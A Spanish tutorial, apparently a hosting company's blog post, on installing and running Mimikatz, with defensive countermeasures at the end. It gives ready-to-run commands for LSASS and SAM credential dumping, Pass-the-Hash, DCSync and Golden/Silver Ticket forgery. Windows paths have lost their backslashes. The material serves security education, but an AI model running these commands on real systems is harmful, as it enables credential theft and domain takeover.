Cómo Instalar y Usar Mimikatz: Una Guía Completa para Profesionales de Seguridad

Mimikatz es una de las herramientas más conocidas y ampliamente discutidas en el mundo de la ciberseguridad. Desarrollada originalmente como prueba de concepto para demostrar vulnerabilidades en la autenticación de Windows, se ha convertido en un instrumento esencial en el conjunto de herramientas de los testers de penetración, equipos red team e investigadores de seguridad. Esta guía proporciona un recorrido exhaustivo sobre qué es Mimikatz, quién lo usa y cómo instalarlo y operarlo de manera responsable en un entorno controlado.

> Aviso Legal: Mimikatz solo debe usarse en sistemas que usted posea o para los que tenga autorización escrita explícita para realizar pruebas. El uso no autorizado es ilegal y puede resultar en graves sanciones penales. Esta guía está destinada únicamente a fines educativos y pruebas de seguridad legítimas.

—

¿Qué es Mimikatz?

Mimikatz es una herramienta de seguridad de Windows de código abierto creada por el investigador de seguridad francés Benjamin Delpy. Su función principal es extraer credenciales de autenticación — incluyendo contraseñas en texto plano, hashes de contraseñas NTLM, códigos PIN y tickets Kerberos — directamente desde la memoria de un sistema Windows (específicamente desde el proceso LSASS).

Debido a que Windows históricamente almacenaba en caché las credenciales en memoria para admitir una autenticación fluida entre servicios, Mimikatz pudo exponer una debilidad de diseño fundamental en cómo el sistema operativo manejaba los datos de autenticación sensibles. Microsoft ha introducido desde entonces mitigaciones como Credential Guard y el grupo de seguridad Protected Users, pero Mimikatz continúa evolucionando junto a estas defensas, convirtiéndolo en una herramienta de referencia invaluable para comprender el panorama de amenazas actual.

Capacidades Clave de Mimikatz

• Extracción de contraseñas en texto plano desde la memoria de Windows (LSASS)
• Volcado de hashes NTLM desde la base de datos SAM y Active Directory
• Extracción y manipulación de tickets Kerberos (ataques Golden Ticket, Silver Ticket)
• Autenticación Pass-the-Hash (PtH) usando hashes capturados
• Ataques Pass-the-Ticket (PtT) usando tickets Kerberos robados
• Ataques DCSync para replicar datos del controlador de dominio sin acceso directo

—

¿Quién Usa Mimikatz y Por Qué?

Casos de Uso de Seguridad Legítimos

Mimikatz es utilizado principalmente por profesionales de seguridad de la información en los siguientes contextos:

• Pruebas de penetración — Simulación de ataques de robo de credenciales del mundo real para evaluar qué tan bien las defensas de una organización resisten ante un adversario que ha obtenido acceso inicial.
• Operaciones de red team — Emulación de técnicas de amenazas persistentes avanzadas (APT) para probar las capacidades de detección y respuesta de los equipos blue team y analistas SOC.
• Auditorías de seguridad — Evaluación de si las contraseñas y los tickets Kerberos se almacenan y protegen de acuerdo con las mejores prácticas de seguridad.
• Formación y concienciación — Demostración a administradores de sistemas e ingenieros de cómo funcionan exactamente los ataques basados en credenciales en la práctica, haciendo que las amenazas abstractas sean tangibles y accionables.
• Investigación de vulnerabilidades — Identificación de nuevas debilidades en los mecanismos de autenticación de Windows antes de que los actores maliciosos puedan explotarlas.

Uso Malicioso

Desafortunadamente, Mimikatz también es una herramienta favorita entre los actores de amenazas debido a su efectividad. Los casos de uso malicioso comunes incluyen:

• Ataques Pass-the-Hash — Autenticación en sistemas usando hashes NTLM capturados sin conocer nunca la contraseña original en texto plano.
• Ataques Pass-the-Ticket — Uso de tickets Kerberos robados para suplantar a usuarios legítimos en una red.
• Persistencia post-explotación — Recolección de credenciales tras una brecha inicial para moverse lateralmente por una red y escalar privilegios.
• Ataques Golden Ticket — Falsificación de Tickets de Concesión de Tickets Kerberos (TGTs) para obtener acceso persistente y casi ilimitado a los recursos del dominio.

Comprender cómo los atacantes usan Mimikatz es precisamente la razón por la que los defensores necesitan estar familiarizados con él. Si está ejecutando un entorno de VPS Hosting o gestionando infraestructura dedicada, conocer estos vectores de ataque le ayuda a construir defensas más resilientes.

—

Requisitos Previos

Antes de continuar, asegúrese de que se cumplan las siguientes condiciones en su entorno de prueba autorizado:

> Mejor Práctica: Realice siempre las pruebas de Mimikatz dentro de una máquina virtual aislada o un servidor de laboratorio dedicado. Si necesita un entorno seguro y aislado para laboratorios de pruebas de penetración, considere implementar una instancia de VPS Hosting con una imagen de Windows para mantener sus pruebas completamente separadas de la infraestructura de producción.

—

Paso 1: Descargar Mimikatz

1.1 Visitar el Repositorio Oficial de GitHub

Mimikatz se mantiene como un proyecto de código abierto. Descárguelo siempre desde la fuente oficial para evitar versiones manipuladas o troyanizadas:

Repositorio Oficial: https://github.com/gentilkiwi/mimikatz

1.2 Descargar la Última Versión

1. Navegue a la sección Releases del repositorio (barra lateral derecha o mediante la ruta URL /releases).
2. Localice la versión estable más reciente.
3. Descargue el archivo precompilado — normalmente llamado mimikatz_trunk.zip.

1.3 Extraer el Archivo

1. Haga clic derecho en el archivo ZIP descargado.
2. Seleccione Extraer todo…
3. Elija un directorio de destino, por ejemplo: C:SecurityToolsMimikatz

Después de la extracción, encontrará dos subdirectorios:

• x64 — Binarios de 64 bits (use este en sistemas modernos)
• Win32 — Binarios de 32 bits (para sistemas heredados)

El ejecutable principal con el que trabajará es mimikatz.exe.

—

Paso 2: Ejecutar Mimikatz

2.1 Abrir un Símbolo del Sistema Elevado

Mimikatz requiere privilegios administrativos para interactuar con regiones de memoria protegidas. Para iniciar un shell elevado:

1. Presione Windows + X
2. Seleccione Símbolo del sistema (Administrador) o Windows PowerShell (Administrador)
3. Haga clic en Sí en el aviso de UAC

2.2 Navegar al Directorio de Mimikatz

cd C:SecurityToolsMimikatzx64

Verifique que mimikatz.exe esté presente en este directorio:

dir mimikatz.exe

2.3 Iniciar Mimikatz

mimikatz.exe

Si la herramienta se inicia correctamente, verá el banner de Mimikatz y el prompt interactivo:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

El prompt mimikatz # confirma que la herramienta está en ejecución y lista para aceptar comandos.

2.4 Habilitar Privilegios de Depuración

Antes de ejecutar la mayoría de los comandos de extracción de credenciales, eleve los propios privilegios de Mimikatz dentro de la sesión:

mimikatz # privilege::debug

Salida esperada:

Privilege '20' OK

Esto otorga a Mimikatz el derecho SeDebugPrivilege, que es necesario para leer la memoria de procesos protegidos como LSASS.

—

Paso 3: Comandos Principales de Mimikatz

3.1 Extraer Contraseñas en Texto Plano desde la Memoria

Esta es la capacidad más conocida de Mimikatz. Lee las credenciales almacenadas en caché por el proveedor de autenticación WDigest directamente desde la memoria LSASS:

mimikatz # sekurlsa::logonpasswords

Qué devuelve:

• Nombres de usuario con sesión iniciada
• Nombres de dominio
• Contraseñas en texto plano (si el almacenamiento en caché WDigest está habilitado)
• Hashes NTLM
• Hashes SHA1
• Credenciales Kerberos

> Nota: En Windows 8.1 y versiones posteriores, Microsoft deshabilitó el almacenamiento en caché de texto plano de WDigest de forma predeterminada. Sin embargo, los atacantes (y los testers) pueden volver a habilitarlo mediante una clave de registro, razón por la cual esto sigue siendo un caso de prueba relevante.

3.2 Mostrar Contraseñas Almacenadas (Comando Alternativo)

mimikatz # sekurlsa::passwords

Este comando proporciona una vista simplificada de las credenciales disponibles en la memoria del sistema.

3.3 Extraer Credenciales desde un Archivo de Volcado de Memoria

Si no puede ejecutar Mimikatz directamente en el sistema objetivo, primero puede capturar un volcado de memoria LSASS y analizarlo sin conexión:

Crear el volcado usando el Administrador de tareas:

1. Abra el Administrador de tareas → pestaña Detalles
2. Haga clic derecho en lsass.exe → Crear archivo de volcado

O use ProcDump (de Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Analizar el volcado con Mimikatz:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Listar Tickets Kerberos

Para enumerar todos los tickets Kerberos presentes en la sesión de inicio de sesión actual:

mimikatz # kerberos::list

Para listar tickets con detalles completos incluyendo claves de sesión:

mimikatz # kerberos::list /export

Esto exporta cada ticket como un archivo .kirbi, que puede usarse en ataques Pass-the-Ticket.

3.5 Exportar Credenciales a un Archivo

Para guardar la salida de un volcado de credenciales en un archivo de texto para análisis posterior:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

La salida se escribirá en credentials.txt en la ruta especificada.

—

Paso 4: Técnicas Avanzadas de Mimikatz

4.1 Ataque Pass-the-Hash (PtH)

Pass-the-Hash permite la autenticación en un sistema remoto usando un hash NTLM capturado, sin necesitar la contraseña en texto plano:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Esto genera un nuevo proceso cmd.exe autenticado como el usuario especificado usando el hash.

4.2 Ataque Golden Ticket

Un Golden Ticket es un TGT Kerberos falsificado firmado con el hash de contraseña de la cuenta KRBTGT, que otorga al portador acceso casi ilimitado a los recursos del dominio. Esto requiere el hash KRBTGT, que puede obtenerse mediante DCSync:

Paso 1 — DCSync para extraer el hash KRBTGT:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Paso 2 — Crear el Golden Ticket:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Paso 3 — Inyectar el ticket:

mimikatz # kerberos::ptt golden.kirbi

4.3 Volcar Hashes NTLM desde la Base de Datos SAM

Para extraer hashes de cuentas locales desde la base de datos SAM (requiere privilegios SYSTEM):

mimikatz # lsadump::sam

4.4 Volcar Secretos desde LSA

mimikatz # lsadump::secrets

Esto recupera los secretos LSA, que pueden incluir credenciales de cuentas de servicio, credenciales de dominio en caché y otros datos sensibles almacenados por la Autoridad de Seguridad Local.

4.5 Ataque Silver Ticket

Un Silver Ticket apunta a un servicio específico en lugar de a todo el dominio. Requiere el hash NTLM de la cuenta del servicio objetivo:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Paso 5: Contramedidas Defensivas

Comprender cómo funciona Mimikatz es solo la mitad de la ecuación. La otra mitad es saber cómo defenderse contra él. Si gestiona servidores Windows — ya sea en Servidores Dedicados o infraestructura basada en la nube — las siguientes mitigaciones son críticas:

5.1 Habilitar Credential Guard

Windows Credential Guard utiliza seguridad basada en virtualización (VBS) para aislar LSASS en un contenedor protegido, evitando que Mimikatz lea credenciales directamente desde la memoria.

Habilitar mediante Directiva de Grupo:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 Deshabilitar la Autenticación WDigest

Evite el almacenamiento en caché de contraseñas en texto plano deshabilitando WDigest:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Agregar Usuarios al Grupo Protected Users

Los miembros del grupo de seguridad Protected Users no pueden autenticarse usando NTLM, DES o cifrado Kerberos RC4, lo que limita significativamente la efectividad de los ataques de robo de credenciales.

5.4 Implementar Protección LSA (RunAsPPL)

Habilite Protected Process Light (PPL) para LSASS para evitar el acceso no autorizado a la memoria:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Monitorear Indicadores de Mimikatz

Configure su solución SIEM o EDR para alertar sobre:

• Acceso a la memoria lsass.exe desde procesos inesperados
• SeDebugPrivilege siendo otorgado a procesos que no son del sistema
• Patrones de comandos sospechosos de sekurlsa, kerberos o lsadump en los registros de procesos
• Eventos inusuales de creación de archivos de volcado LSASS (Event ID 4656, 4663)

5.6 Mantener los Sistemas Actualizados

Muchas técnicas de Mimikatz explotan vulnerabilidades conocidas o comportamientos heredados. Mantener Windows y Active Directory completamente actualizados elimina clases enteras de vectores de ataque.

—

Mimikatz en el Contexto de una Infraestructura de Hosting Segura

Para las organizaciones que ejecutan aplicaciones web, APIs o servicios internos, el riesgo de robo de credenciales se extiende más allá de la estación de trabajo local. Si un atacante obtiene acceso a su entorno de servidor, herramientas como Mimikatz pueden usarse para escalar privilegios y moverse lateralmente.

Elegir un proveedor de hosting que priorice la seguridad a nivel de infraestructura es una capa importante de defensa. Ya sea que necesite Hosting Web Compartido para proyectos más pequeños o Servidores Dedicados para cargas de trabajo empresariales, asegurarse de que su entorno de hosting incluya protección DDoS, aislamiento de red y actualizaciones de seguridad regulares reduce su superficie de ataque general.

Para los equipos que gestionan entornos Active Directory o aplicaciones basadas en Windows, combinar su infraestructura con Certificados SSL correctamente configurados garantiza que las credenciales transmitidas entre clientes y servidores estén cifradas en tránsito — añadiendo otra capa de protección contra la interceptación.

—

Resumen: Referencia de Comandos de Mimikatz

—

Conclusión

Mimikatz sigue siendo una de las herramientas más potentes e instructivas disponibles para los profesionales de la ciberseguridad. Su capacidad para exponer debilidades fundamentales en los mecanismos de autenticación de Windows ha impulsado mejoras significativas en cómo Microsoft diseña la protección de credenciales — desde Credential Guard hasta Protected Users y LSA PPL. Para los testers de penetración, equipos red team e investigadores de seguridad, una comprensión profunda de Mimikatz no es opcional; es esencial.

Los principios clave que siempre debe tener en cuenta:

• Obtenga siempre autorización escrita explícita antes de usar Mimikatz en cualquier sistema.
• Use entornos aislados — máquinas virtuales o servidores de laboratorio dedicados — para evitar exposición accidental.
• Comprenda las defensas tan profundamente como comprende los ataques.
• Manténgase actualizado — tanto Mimikatz como las defensas de Windows evolucionan continuamente.

Al combinar el conocimiento práctico de herramientas como Mimikatz con una infraestructura de hosting segura y bien configurada, los equipos de seguridad pueden construir defensas que estén genuinamente probadas contra técnicas de ataque del mundo real en lugar de suposiciones teóricas.

—

*AlexHost proporciona soluciones de hosting seguras y de alto rendimiento diseñadas pensando en los profesionales conscientes de la seguridad. Explore nuestros planes de VPS Hosting y Servidores Dedicados para construir su próximo laboratorio seguro o entorno de producción.*